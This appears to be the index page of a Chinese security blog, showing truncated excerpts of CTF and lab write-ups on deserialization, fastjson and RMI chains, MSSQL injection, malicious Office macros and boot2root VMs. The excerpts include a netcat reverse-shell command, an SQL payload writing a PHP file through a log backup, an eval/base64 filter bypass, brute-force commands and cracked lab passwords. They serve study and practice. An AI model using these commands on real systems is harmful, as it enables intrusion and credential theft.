ke1nys`Blog

二次反序列化

官方wp 看了wp之后，学到了一个新技巧 就是在/用不了的时候，我们可以使用先进行编码，然后在进行解码的方式来进行绕过 例如 eval(base64_decode('c3lzdGVtKCJscyAvIik7')); 这里的话先介绍一下这个parse_url函数 这里话在ctfshow的web入门里也有 12345678910111213141516171819<?php$url = 'http://user:pass@host/path?args=value#anch';print_r(parse_url($url));echo parse_url($url, PHP_URL_PATH);?>结果--------------------------------------------------------------------Array( [scheme] => http [host] => host [user] => user [pass] => pass [path] = ...

参考视频 参考文章 概述Java RMI机制能够让一台Java虚拟机上的对象调用运行在另一台Java虚拟机上的对象的方法。总结一下，RMI机制的实现依赖于以下三个部分 RMI Server RMI Registry RMI Client 简单概括一下RMI的流程：Server端事先在Registry处bind将要被调用的远程对象。当Client需要调用远程对象时，先根据rmi://地址连接到Registry，然后在Registry处查看是否绑定有需要的远程对象。如果有，则Registry返回Server端的rmi://地址以及开放的端口，Client据此连接到Server。然后才开始真正的远程方法调用，远程方法在Server端执行，Server将执行后的结果发送给Client。 RMI的恶意利用先创建两个项目 RMIServer RMIClient 这两个项目都要有相同的接口 先创建两个项目，分别是客户端和服务端(然后有相同的接口) 服务端已经开了个端口出去了，客户端就可以直接去进行访问 但是客户端并不知道开的端口是啥，这里就得通过这个注册中心开的端口来找 默认的是1099， ...

参考文章 这里用的是fastjson 1.2.24版本来进行分析 给上面的图片在添加一个条件，满足条件的getter也行 这就是fastjson和原生类的反序列化的不同之处 JdbcRowSetImpl链子这个链子是必须出网的 com.sun.rowset.JdbcRowSetImpl中的dataSourceName属性 寻找他的set方法 然后跟进到他的setdataSourceName方法 这里就是把传进去的值赋给dataSource 这里再看autoCommit属性，然后去查看他的set方法，setautocommit,需要传入一个布尔类型的参数 判断conn是否为空 不然就赋值 跟进connect方法 lookup(getDataSourceName()) lookup函数链接我们写入的服务 加载我们的恶意类构造恶意类 根据最后的connect()方法，前面的操作就讲得通了 因为前面得conn默认为空，所以能进入下一层，然后又因为我们给了DataSourceName赋值，又可以进入下一层，然后就是lookup()函数进行连接了，连接得值刚好是DataSourceNa ...

这里的话只复现部分题 官方wp地址 ezsql(sql server mssql) 考查的是sqlserver 也是mssql 这里的话是给了查询语句 列和表都给了 id users 数据库查询 查出来是ctf 在sqlserver中 数据库是db_name() 拿出祖传字典fuzz一下，发现过滤了空格、星号、百分号、引号以及常用的增删查改关键字（但是大小写能绕过，这个点很重要） SQL Server注入技巧与提权方式详解 可以了解一下这个空格绕过 payload 1231;ALTER%1eTABLE%1eusers�ADD�wcs�varchar(2000)�NULL;1;inSert�into�users(id,wcs,name)�values�(17,0x3c3f70687020706870696e666f28293b203f3e,36);1;declare�@wcs�varchar(2000)�set�@wcs=0x2f7661722f7777772f68746d6c2f6f6b6f6b2e706870�bacKup�log�ctf�to�disk=@wcs�wi ...

前两个是 VBScript 代码 和 HTA代码 前者是可以在本地上运行，后者是可以弹shell也可以在本地运行 应用程序的 Visual Basic (VBA)这是 Microsoft 为 Microsoft Word、Excel、PowerPoint 等 Microsoft 应用程序实施的一种编程语言 VBA 编程允许自动执行用户与 Microsoft Office 应用程序之间几乎所有键盘和鼠标交互的任务。 这句话是重点 宏是 Microsoft Office 应用程序，其中包含以称为 Visual Basic for Applications (VBA) 的编程语言编写的嵌入式代码。它用于创建自定义功能，以通过创建自动化流程来加速手动任务 我们将讨论 VBA 的基础知识以及对手使用宏创建恶意 Microsoft 文档的方式。 现在创建一个新的空白 Microsoft 文档来创建我们的第一个 宏。目的是讨论该语言的基础知识，并展示如何在打开 Microsoft Word 文档时运行它。首先，我们需要通过选择 视图→ 宏来打开 Visual Basic 编辑器。宏窗口显示在文 ...

官方wp地址 韩国老外的wp Blackbox 这里的话访问会报错，就是个文件包含，然后可以尝试用伪协议进行读取文件内容 扫目录的时候发先git源码泄露 于是使用githack工具去看能否读取到一些东西 读取到了文件，然后并下载下来了 index.php 12345678910111213141516<?php$resource = 'home';require './config.php';require './util.php';set_include_path(INCLUDE_DIR);if(isset($_GET['page'])) { $resource = $_GET['page']; include($_GET['page'] . '.php');} else { include('home.php');}?> util.php 12345678910 ...

先扫一下c段发现靶机 然后扫一下端口 发现了个新端口 没见过 还是先查看一下80端口 查看源码发现版本和框架 那么就去找一下看存不存在漏洞 发现存在漏洞，于是就尝试进行漏洞利用 然后将脚本复制到出来执行 刚好发现了数据库的账号密码 这里的话使用的python2 python3的话会报错 这里看的不方便，于是尝试一下反弹shell 存在nc命令，可以使用nc反弹 1nc 192.168.142.129 6666 -e /bin/bash 反弹shell成功，那么我们就进行python的shell交互一下 那么我们就尝试一下刚刚拿到的数据的账号密码进行用户的切换 clapton / yaraklitepe 因为直接cd /home/clapton 权限不够 成功了 然后就可以拿到第一个flag了 这里的话又给出一个缓冲区溢出提权： 先把input文件下到本地 开启有个服务 python -m SimpleHTTPServer 因为http模块没有，就只能用这个模块了 成功下到本地 这里进行了解就行了 缓冲区溢出提权知道就行 实际的操作不太会 ...

先扫c段发现靶机 然后接着扫一下端口 发现只有一个80端口 于是进行访问 然后就先扫一下目录吧 发现给了一个路劲 然后进行访问 这里的话爬虫协议也给了一个提示 别忘了加上，zip扩展到你的dir brute 然后在重新爆破一下目录，因为默认字典爆破不出来 1dirsearch -u http://172.16.5.12/ -e php -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 100 扫到有个目录，然后进行访问 发现下载下来了一个压缩包，但是访问得需要密码，那么我们就开始使用john进行爆破，就是得先把这个玩意转化成john能识别的样子 1使用命令：zip2join spammer.zip > password.txt 然后进行爆破 爆破出来了 然后进行访问 发现给了个类似账号密码的东西，然后就开始进行后台登录 后台登录成功 这里就开始找漏洞利用点了 这里的话可以进行恶意文件的上传，刚好可以进行shell的反弹 这里的话就使用php反弹，这里的话kali自 ...

开始先扫一下c段发现靶机 然后开始扫一下端口 还是标配两个端口 进行80端口的访问 是一个wordpress cms框架的网页 这里也给了版本 可以先用wpscan工具去进行扫描 这里先去找一下后台，用dirb先扫一下这个网址 扫到了后台，那么我们就去用wpcan工具去扫一下网站的用户名 1wpscan --url http://192.168.205.142 -e u 然后使用cewl生成密码字典配合wpscan进行爆破 1cewl -m 3 -w passwd.txt http://192.168.205.142 -m 是指的密码的最短长度 然后使用wpcan进行爆破 1wpscan --url http://192.168.205.142/ -e u --passwords passwd.txt 报出用户名和密码了，接下来进行登录 1Username: gill, Password: interchangeable 成功进行登录 于是就开始尝试找漏洞了 发现一张网站页面没有的图片，于是尝试把他下载下来进行查看 成功下载下来 这里查看图片得使用这个工具 ...